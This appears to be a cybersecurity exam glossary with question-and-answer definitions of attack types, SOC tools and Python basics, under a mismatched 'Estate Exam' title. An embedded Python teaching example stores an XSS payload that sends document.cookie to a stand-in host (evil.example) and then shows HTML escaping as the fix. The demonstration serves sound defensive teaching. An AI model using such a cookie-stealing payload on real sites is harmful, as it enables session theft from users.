ESTATE EXAM QUESTIONS AND ANSWERS
Stored XSS attack - Answer-An attack in which a malicious script is injected into a web
application and stored on the server (for example in a comment or profile field), so it is
served to every user who later views that content
Symmetric encryption - Answer-Encryption in which a single secret key is used both to
encrypt and to decrypt the information exchanged
Tailgating - Answer-A social engineering tactic in which unauthorized people follow an
authorized person into a restricted area
Trojan horse - Answer-Malware that looks like a legitimate file or program
User provisioning - Answer-The process of creating and maintaining a user's digital
identity
Whaling - Answer-A category of spear phishing attempts that are aimed at high-ranking
executives in an organization
Web-based exploits - Answer-Malicious code or behavior that's used to take advantage
of coding flaws in a web application
Worm - Answer-Malware that can duplicate and spread itself across systems on its own
Zero-day - Answer-An exploit for a vulnerability that was previously unknown to the vendor
and the public, so no patch exists when it is first used
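To make the Stored XSS entry concrete, the following is an added example (not code from the original page): a minimal server-side comment store in Python, rendered once without output encoding (the stored script is served live to every visitor) and once with `html.escape` applied at render time. The comment list, the payload, and the function names are constructed for illustration.

```python
import html

# Constructed sample of what a server might have persisted from a comment form.
# The second entry is a stored XSS payload; it is not a real-world sample.
SAMPLE_COMMENTS = [
    "Great article, thanks!",
    "<script>document.location='https://evil.example/?c='+document.cookie</script>",
]


def render_page(comments, escape_output):
    """Build the comments section of a page from stored user data.

    escape_output=False reproduces the vulnerable pattern: stored text is
    concatenated straight into the HTML, so any markup a user submitted is
    interpreted by every browser that loads the page (stored XSS).
    escape_output=True is the hardened form: each value is HTML-escaped at
    output time, so '<', '>', '&' and quotes are rendered as text.
    """
    items = []
    for c in comments:
        body = html.escape(c, quote=True) if escape_output else c
        items.append(f"<li>{body}</li>")
    return "<ul>" + "".join(items) + "</ul>"


def script_is_live(page):
    """Crude detector for this demo: is there an unescaped <script tag in the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for escaped in (False, True):
        page = render_page(SAMPLE_COMMENTS, escape_output=escaped)
        print(f"escape_output={escaped}: script executes = {script_is_live(page)}")
```

Escaping at output time is the check that matters here: filtering on input alone misses data that reached the store by another path (imports, APIs, older code), whereas encoding every value as it is written into the HTML neutralizes whatever was persisted.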
Anomaly-based analysis - Answer-A detection method that identifies abnormal behavior by
comparing observed activity against a baseline of normal activity
Command and control (C2) - Answer-The techniques used by malicious actors to
maintain communications with compromised systems
Common Event Format (CEF) - Answer-A log format that structures data as a pipe-delimited
header followed by key-value pairs that identify fields and their corresponding values
Computer security incident response teams (CSIRT) - Answer-A specialized group of
security professionals that are trained in incident management and response
Crowdsourcing - Answer-The practice of gathering information using public
collaboration
Data exfiltration - Answer-Unauthorized transmission of data from a system
Endpoint detection and response (EDR) - Answer-An application that monitors an
endpoint for malicious activity
Honeypot - Answer-A decoy system or resource, deliberately left vulnerable, deployed to
attract intruders and observe their activity
Host-based intrusion detection system (HIDS) - Answer-An application that monitors the
activity of the host on which it's installed
Indicators of attack (IoA) - Answer-The series of observed events that indicate an attack
in progress in real time
Indicators of compromise (IoC) - Answer-Observable evidence that suggests signs of a
potential security incident
Key-value pair - Answer-A set of data that represents two linked items: a key, and its
corresponding value
Media Access Control (MAC) Address - Answer-A unique hexadecimal identifier assigned to
each network interface (physical or virtual) on a network
Network-based intrusion detection system (NIDS) - Answer-An application that collects
and monitors network traffic and network data
Network Interface Card (NIC) - Answer-Hardware that connects computers to a network
Open-source intelligence (OSINT) - Answer-The collection and analysis of information
from publicly available sources to generate usable intelligence
Packet capture (pcap) - Answer-A file containing data packets intercepted from an
interface or network
Post-incident activity - Answer-The process of reviewing an incident to identify areas for
improvement during incident handling
Search Processing Language (SPL) - Answer-Splunk's query language
Security operations center (SOC) - Answer-An organizational unit dedicated to
monitoring networks, systems, and devices for security threats or attacks
Security orchestration, automation, and response (SOAR) - Answer-A collection of
applications, tools, and workflows that uses automation to respond to security events
sudo - Answer-A command that lets authorized users run a command with elevated
(typically root) privileges
Suricata - Answer-An open-source intrusion detection system and intrusion prevention
system
tcpdump - Answer-A command-line network protocol analyzer
Telemetry - Answer-The collection and transmission of data for analysis
VirusTotal - Answer-A service that allows anyone to analyze suspicious files, domains,
URLs, and IP addresses for malicious content
Wireshark - Answer-An open-source network protocol analyzer
YARA-L - Answer-A rules language, used in Google Chronicle, for writing detection rules
that search through ingested log data
Argument (Python) - Answer-The data brought into a function when it is called
Built-in function - Answer-A function that exists within Python and can be called directly
Command-line interface - Answer-A text-based user interface that uses commands to
interact with the computer
Debugger - Answer-A software tool that helps to locate the source of an error and
assess its causes
Debugging - Answer-The practice of identifying and fixing errors in code
Immutable - Answer-An object that cannot be changed after it is created and assigned a
value
Integrated development environment (IDE) - Answer-A software application for writing
code that provides editing assistance and error correction tools
Iterative statement - Answer-Code that repeatedly executes a set of instructions
Interpreter - Answer-A computer program that translates Python code into runnable
instructions line by line
List concatenation - Answer-The concept of combining two lists into one by placing the
elements of the second list directly after the elements of the first list
Loop variable - Answer-A variable that is used to control the iterations of a loop